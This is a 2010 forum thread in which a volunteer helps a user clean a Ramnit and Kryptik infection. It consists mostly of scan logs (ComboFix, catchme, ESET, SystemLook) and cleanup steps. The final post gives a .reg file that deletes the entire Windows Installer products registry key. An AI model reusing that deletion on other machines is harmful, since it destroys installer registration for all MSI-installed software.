[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Broadcom Wireless Manager UI]
2006-11-01 12:48 1392640 ----a-w- e:\windows\system32\WLTRAY.EXE

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\CTFMON.EXE]
2004-08-04 10:00 15360 ----a-w- e:\windows\system32\ctfmon.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\igfxhkcmd]
2006-06-06 17:06 77824 ----a-w- e:\windows\system32\hkcmd.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\igfxpers]
2006-06-06 17:10 118784 ----a-w- e:\windows\system32\igfxpers.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\igfxtray]
2006-06-06 17:09 94208 ----a-w- e:\windows\system32\igfxtray.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iTunesHelper]
2010-01-22 19:16 141608 ----a-w- e:\program files\iTunes\iTunesHelper.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Malwarebytes Anti-Malware (rootkit-scan)]
2010-04-29 14:39 1090952 ----a-w- e:\program files\Malwarebytes' Anti-Malware\mbam.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\MSMSGS]
2004-08-04 01:06 1667584 ----a-w- e:\program files\Messenger\msmsgs.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SDFix]
2008-11-05 23:58 964661 ----a-w- e:\sdfix\RunThis.bat

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SigmatelSysTrayApp]
2007-05-10 10:22 405504 ----a-w- e:\program files\SigmaTel\C-Major Audio\WDM\stsystra.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SUPERAntiSpyware]
2010-05-18 17:26 2397424 ----a-w- e:\program files\SUPERAntiSpyware\SUPERAntiSpyware.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SynTPEnh]
2006-03-08 12:48 761947 ----a-w- e:\program files\Synaptics\SynTP\SynTPEnh.exe

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run-]
"ISTray"="e:\program files\Spyware Doctor\pctsTray.exe"

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"= 0 (0x0)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"e:\\Program Files\\Opera\\opera.exe"=
"e:\\Program Files\\Bonjour\\mDNSResponder.exe"=
"e:\\Program Files\\iTunes\\iTunes.exe"=
"e:\\Program Files\\uTorrent\\uTorrent.exe"=
"e:\\Program Files\\Veoh Networks\\VeohWebPlayer\\veohwebplayer.exe"=
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"e:\\Program Files\\Samsung\\Samsung New PC Studio\\npsasvr.exe"=
"e:\\Program Files\\Samsung\\Samsung New PC Studio\\npsvsvr.exe"=

R0 PCTCore;PCTools KDS;e:\windows\system32\drivers\PCTCore.sys [29/07/2010 10:10 218592]
R1 cmdGuard;COMODO Internet Security Sandbox Driver;e:\windows\system32\drivers\cmdGuard.sys [04/06/2010 11:55 229312]
R1 cmdHlp;COMODO Internet Security Helper Driver;e:\windows\system32\drivers\cmdhlp.sys [01/06/2010 19:00 25240]
R1 SASDIFSV;SASDIFSV;e:\program files\SUPERAntiSpyware\sasdifsv.sys [17/02/2010 19:25 12872]
R1 SASKUTIL;SASKUTIL;e:\program files\SUPERAntiSpyware\SASKUTIL.SYS [10/05/2010 19:41 67656]
R2 a2free;a-squared Free Service;e:\program files\a-squared Free\a2service.exe [13/06/2010 17:14 1872320]
R2 FsUsbExService;FsUsbExService;e:\windows\system32\FsUsbExService.Exe [20/04/2010 11:18 237984]
R3 BCASPROT;Advanced System Protector;e:\program files\Systweak\Advanced System Protector\sasprot32.sys [15/06/2010 13:39 6656]
R3 FsUsbExDisk;FsUsbExDisk;e:\windows\system32\FsUsbExDisk.Sys [20/04/2010 11:18 36608]
S2 wscsvcSpooler;Security Center wscsvcSpooler;e:\windows\system32\adsldpca.exe srv --> e:\windows\system32\adsldpca.exe srv [?]
S3 MEMSWEEP2;MEMSWEEP2;\??\e:\windows\system32\8C.tmp --> e:\windows\system32\8C.tmp [?]
S3 s1018bus;Sony Ericsson Device 1018 driver (WDM);e:\windows\system32\drivers\s1018bus.sys [01/04/2010 18:33 86824]
S3 s1018mdfl;Sony Ericsson Device 1018 USB WMC Modem Filter;e:\windows\system32\drivers\s1018mdfl.sys [02/04/2010 11:00 15016]
S3 s1018mdm;Sony Ericsson Device 1018 USB WMC Modem Driver;e:\windows\system32\drivers\s1018mdm.sys [02/04/2010 11:00 114728]
S3 s1018mgmt;Sony Ericsson Device 1018 USB WMC Device Management Drivers (WDM);e:\windows\system32\drivers\s1018mgmt.sys [02/04/2010 11:00 106208]
S3 s1018nd5;Sony Ericsson Device 1018 USB Ethernet Emulation (NDIS);e:\windows\system32\drivers\s1018nd5.sys [01/04/2010 18:33 26024]
S3 s1018obex;Sony Ericsson Device 1018 USB WMC OBEX Interface;e:\windows\system32\drivers\s1018obex.sys [02/04/2010 11:00 104744]
S3 s1018unic;Sony Ericsson Device 1018 USB Ethernet Emulation (WDM);e:\windows\system32\drivers\s1018unic.sys [01/04/2010 18:33 109864]
S4 sptd;sptd;e:\windows\system32\drivers\sptd.sys [02/02/2010 01:58 691696]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
bdx REG_MULTI_SZ scan
.
.
------- Supplementary Scan -------
.
IE: Convert link target to Adobe PDF - e:\program files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Convert link target to existing PDF - e:\program files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert selected links to Adobe PDF - e:\program files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
IE: Convert selected links to existing PDF - e:\program files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
IE: Convert selection to Adobe PDF - e:\program files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Convert selection to existing PDF - e:\program files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert to Adobe PDF - e:\program files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Convert to existing PDF - e:\program files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
FF - ProfilePath - e:\documents and settings\Mike\Application Data\Mozilla\Firefox\Profiles\99m84v2t.default\
FF - prefs.js: browser.startup.homepage - hxxp://www.google.co.uk/
FF - HiddenExtension: Microsoft .NET Framework Assistant: {20a82645-c095-46ed-80e3-08825760534b} - e:\windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension\

---- FIREFOX POLICIES ----
FF - user.js: network.cookie.cookieBehavior - 0
FF - user.js: privacy.clearOnShutdown.cookies - false
FF - user.js: security.warn_viewing_mixed - false
FF - user.js: security.warn_viewing_mixed.show_once - false
FF - user.js: security.warn_submit_insecure - false
FF - user.js: security.warn_submit_insecure.show_once - false
e:\program files\Mozilla Firefox\greprefs\all.js - pref("ui.use_native_colors", true);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.lu", true);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.nu", true);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.nz", true);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.xn--mgbaam7a8h", true);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.xn--mgberp4a5d4ar", true);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.xn--p1ai", true);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.xn--mgbayh7gpa", true);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.tel", true);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.auth.force-generic-ntlm", false);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.proxy.type", 5);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.buffer.cache.count", 24);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.buffer.cache.size", 4096);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("dom.ipc.plugins.timeoutSecs", 45);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("svg.smil.enabled", false);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("accelerometer.enabled", true);
e:\program files\Mozilla Firefox\greprefs\security-prefs.js - pref("security.ssl.allow_unrestricted_renego_everywhere__temporarily_available_pref", true);
e:\program files\Mozilla Firefox\greprefs\security-prefs.js - pref("security.ssl.renego_unrestricted_hosts", "");
e:\program files\Mozilla Firefox\greprefs\security-prefs.js - pref("security.ssl.treat_unsafe_negotiation_as_broken", false);
e:\program files\Mozilla Firefox\greprefs\security-prefs.js - pref("security.ssl.require_safe_negotiation", false);
e:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("extensions.{972ce4c6-7e08-4474-a285-3208198ce6fd}.name", "chrome://browser/locale/browser.properties");
e:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("extensions.{972ce4c6-7e08-4474-a285-3208198ce6fd}.description", "chrome://browser/locale/browser.properties");
e:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("plugins.update.notifyUser", false);
e:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("dom.ipc.plugins.enabled.nptest.dll", true);
e:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("dom.ipc.plugins.enabled.npswf32.dll", true);
e:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("dom.ipc.plugins.enabled.npctrl.dll", true);
e:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("dom.ipc.plugins.enabled.npqtplugin.dll", true);
e:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("dom.ipc.plugins.enabled", false);
.

**************************************************************************

catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2010-08-08 01:18
Windows 5.1.2600 Service Pack 2 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************

[HKEY_LOCAL_MACHINE\System\ControlSet005\Services\MEMSWEEP2]
"ImagePath"="\??\e:\windows\system32\8C.tmp"
.
--------------------- DLLs Loaded Under Running Processes ---------------------

- - - - - - - > 'winlogon.exe'(568)
e:\program files\SUPERAntiSpyware\SASWINLO.DLL
e:\windows\system32\WININET.dll
e:\windows\System32\BCMLogon.dll

- - - - - - - > 'explorer.exe'(3960)
e:\windows\system32\WININET.dll
e:\windows\system32\IEFRAME.dll
e:\windows\system32\msi.dll
e:\windows\system32\mshtml.dll
e:\windows\system32\WPDShServiceObj.dll
e:\windows\system32\PortableDeviceTypes.dll
e:\windows\system32\PortableDeviceApi.dll
.
------------------------ Other Running Processes ------------------------
.
e:\program files\COMODO\COMODO Internet Security\cmdagent.exe
e:\windows\System32\WLTRYSVC.EXE
e:\windows\System32\bcmwltry.exe
e:\program files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
e:\program files\Bonjour\mDNSResponder.exe
e:\windows\system32\msiexec.exe
e:\windows\system32\wscntfy.exe
.
**************************************************************************
.
Completion time: 2010-08-08 01:23:11 - machine was rebooted
ComboFix-quarantined-files.txt 2010-08-08 00:23
ComboFix2.txt 2010-08-07 22:51
ComboFix3.txt 2010-07-26 13:37

Pre-Run: 32,682,283,008 bytes free
Post-Run: 33,202,368,512 bytes free

Current=5 Default=5 Failed=3 LastKnownGood=6 Sets=1,2,3,4,5,6
- - End Of File - - 039C1780E070F48A68B811B8F2E4C1DE


One other odd behaviour I forgot to mention - every time I click on a folder icon/use windows explorer the windows installer for Acrobat 7 starts up.....

Cheers

Mike

Attached Files



#9 m0le

m0le

    Can U Dig It?


  • Malware Response Team
  • 34,527 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:London, UK
  • Local time:09:39 PM

Posted 07 August 2010 - 08:03 PM

Please run the online scan at ESET so we can make sure we've got everything.
  1. Hold down Control and click on the following link to open ESET OnlineScan in a new window.
    ESET OnlineScan
  2. Click the button.
  3. For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
    1. Click on to download the ESET Smart Installer. Save it to your desktop.
    2. Double click on the icon on your desktop.
  4. Check
  5. Click the button.
  6. Accept any security warnings from your browser.
  7. Leave the top box checked and then check
  8. Push the Start button.
  9. ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  10. When the scan completes, push
  11. Push , and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
  12. Push the button.
  13. Push
NOTE: If no malware is found then no log will be produced. Let me know if this is the case.
Posted Image
m0le is a proud member of UNITE

#10 mikethecow

mikethecow
  • Topic Starter

  • Members
  • 28 posts
  • OFFLINE
  •  
  • Local time:10:39 PM

Posted 08 August 2010 - 03:33 AM

Hi M0le

Sorry i passed out last night.

Here is the woeful Eset log sad.gif
QUOTE
E:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll Win32/Ramnit.A virus cleaned - quarantined
E:\Program Files\Microsoft\DesktopLayer.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\Program Files\Movie Maker\moviemk.exe Win32/Ramnit.A virus cleaned - quarantined
E:\Program Files\Outlook Express\msoe.dll Win32/Ramnit.A virus cleaned - quarantined
E:\Qoobox\Quarantine\E\Program Files\Microsoft\DesktopLayer.exe.vir a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP23\A0057922.dll Win32/Ramnit.A virus cleaned - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP23\A0057923.exe Win32/Ramnit.A virus cleaned - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP23\A0057924.exe Win32/Ramnit.A virus cleaned - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP23\A0058047.dll Win32/Ramnit.A virus cleaned - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP23\A0058063.exe Win32/Ramnit.A virus cleaned - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP23\A0058823.exe Win32/Ramnit.A virus cleaned - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP23\A0058836.dll Win32/Ramnit.A virus cleaned - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP23\A0058896.dll Win32/Ramnit.A virus cleaned - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP23\A0059821.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP24\A0060939.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP24\A0060940.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP24\A0060941.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP24\A0060977.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP24\A0060983.exe Win32/Ramnit.A virus cleaned - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP24\A0062009.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP24\A0062053.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP24\A0062054.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP25\A0063091.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP26\A0064140.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP26\A0064166.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP26\A0064182.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP26\A0065193.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP28\A0065264.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP28\A0065415.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP28\A0065417.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP28\A0065542.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP28\A0065617.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP28\A0065648.dll Win32/Ramnit.A virus cleaned - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP28\A0065649.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP28\A0065650.exe Win32/Ramnit.A virus cleaned - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP28\A0065653.dll Win32/Ramnit.A virus cleaned - quarantined
E:\WINDOWS\ExplorerSrv.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined


Thanks M0le

Mike

Attached Files



#11 m0le

m0le

    Can U Dig It?


  • Malware Response Team
  • 34,527 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:London, UK
  • Local time:09:39 PM

Posted 08 August 2010 - 04:03 AM

ESET doesn't tell the whole story. You can ignore the Qoobox and System Restore entries.

The others are just the beginnings of the infection being removed. It's the usual final step in most fixes.

How is the PC running now? Still getting the file injection?
Posted Image
m0le is a proud member of UNITE

#12 mikethecow

mikethecow
  • Topic Starter

  • Members
  • 28 posts
  • OFFLINE
  •  
  • Local time:10:39 PM

Posted 08 August 2010 - 05:01 AM

Hi M0le

deleted all the vb script out of html & htm files and restarted several times.

so far so good - hasn't reappeared, nor has 'desktoplayer' of 'explorerSRv.exe' !

still getting the annoying Windows Installer for Acrobat 7 appearing when I open folders - if you can shed any light on that would be brilliant.

do you ever sleep by the way?

Mike

#13 m0le

m0le

    Can U Dig It?


  • Malware Response Team
  • 34,527 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:London, UK
  • Local time:09:39 PM

Posted 08 August 2010 - 05:12 AM

I do sleep...it's an option anyway tongue.gif

This is a problem with where Adobe places its folder when it installs on your computer. We can try and find this using SystemLook.

Please download SystemLook from one of the links below and save it to your Desktop.
Download Mirror #1
Download Mirror #2
  • Double-click SystemLook.exe to run it.
  • Copy the content of the following codebox into the main textfield:
    CODE
    :reg
    hkey_local_machine\software\classes\installer\products
    :filefind
    acropro.msi

  • Click the Look button to start the scan.
  • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
Note: The log can also be found on your Desktop entitled SystemLook.txt
Posted Image
m0le is a proud member of UNITE

#14 mikethecow

mikethecow
  • Topic Starter

  • Members
  • 28 posts
  • OFFLINE
  •  
  • Local time:10:39 PM

Posted 08 August 2010 - 05:31 AM

System Look log


QUOTE
SystemLook v1.0 by jpshortstuff (11.01.10)
Log created at 11:23 on 08/08/2010 by Mike (Administrator - Elevation successful)

========== reg ==========

[HKEY_LOCAL_MACHINE\software\classes\installer\products]
(No values found)

[HKEY_LOCAL_MACHINE\software\classes\installer\products\01E4D47B330100000000000000000010]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\08E8456490400000E7A85400F0580510]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\0CB8AE65157339B4CBD96615CC635EAA]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\0DC1503A46F231838AD88BCDDC8E8F7C]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\26DDC2EC4210AC63483DF9D4FCC5B59D]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\283F4817C6A858B43ACA6B73431B2E14]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\32178270CA8BEC143864D37727543CB5]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\3618C4F7952F0A940A8182759A5087CB]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\3C69C2D13F3A7E948B935972D9DE38F7]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\3e43b73803c7c394f8a6b2f0402e19c2]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\427995CA55751C84BA7EBA8B75569203]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\4BB1B6CC60E4B5A41A663B175B1523B4]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\4C7BB6329144DF244090E152A7523ED4]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\58F0D9C98565E5A4599A567FBD9261EE]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\5B30E9DFAEEA95D45B21C64EAA20184D]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\68AB67CA330100007706000000000020]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\68AB67CA7DA73301B7449A0300000010]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\6D5E4E6D39674BB459AB123FF8FAEE09]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\6E8A266FCD4F2A1409E1C8110F44DBCE]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\7475C687330100005BE8000000000010]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\8767879E33010000E876000000000010]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\8CAF48E7815C9F048970475503D1D652]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\952D7EE5731D8344A9F5244F23CE4012]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\B6ED15411EBA26F4EBA93B361A57882A]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\C80D5F2B97E7DCF4AA4F75DA53FF6010]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\C9AAD94C8AB5A95428445EB796FDF040]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\CFD2C1F142D260E3CB8B271543DA9F98]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\D20352A90C039D93DBF6126ECE614057]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\D47ABDE8686099C4FBDD8F4976E8B593]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\D55AEDAA438CBCB4893AB4D8C1814FEE]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\DC3BF90CC0D3D2F398A9A6D1762F70F3]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\DDA39468D428E8B4DB27C8D5DC5CA217]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\E0CF391F81E9CF049A4705A9B1DD42A0]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\F65865963B6B0EB4ABB0F894B53E0233]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\FA7D934F3F30E8F4EA4C75B1EF79C716]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\FD563AF386D2DE54F838C8A8336E1534]


========== filefind ==========

Searching for "acropro.msi"
E:\Program Files\Adobe\Adobe Acrobat 7.0\Setup Files\AcroPro\ENU\AcroPro.msi --a--- 3888640 bytes [09:12 02/02/2010] [09:12 02/02/2010] 39F424137795ED0AC75122AB49C346F4

-=End Of File=-


'sleep gives you cancer...everybody knows that' thumbup2.gif

#15 m0le

m0le

    Can U Dig It?


  • Malware Response Team
  • 34,527 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:London, UK
  • Local time:09:39 PM

Posted 08 August 2010 - 01:21 PM

Adobe's installers are found in that registry path. Removing the subkey will stop the problem...or should.

Backup Your Registry with ERUNT
  • Please use the following link and scroll down to ERUNT and download it.
    http://aumha.org/freeware/freeware.php
  • For version with the Installer:
    Use the setup program to install ERUNT on your computer
  • For the zipped version:
    Unzip all the files into a folder of your choice.
Click Erunt.exe to backup your registry to the folder of your choice.

Note: to restore your registry, go to the folder and start ERDNT.exe

Open notepad. Please copy the contents of the code box below. To do this highlight the contents of the box and right click on it. Paste this into the open notepad. Save it to your desktop (click file, save as) as fixit.reg In the same open notepad, in the line below select Any for File Type.

CODE
REGEDIT4

[-HKEY_LOCAL_MACHINE\software\classes\installer\products]


NOTICE: This file was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Locate fixit.reg on your Desktop and double-click on it.
You will receive a prompt similar to: "Do you wish to merge the information into the registry?".
Answer "Yes" and wait for a message to appear similar to "Merged Successfully".

Please reply back letting me know if it merged correctly.
Posted Image
m0le is a proud member of UNITE




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users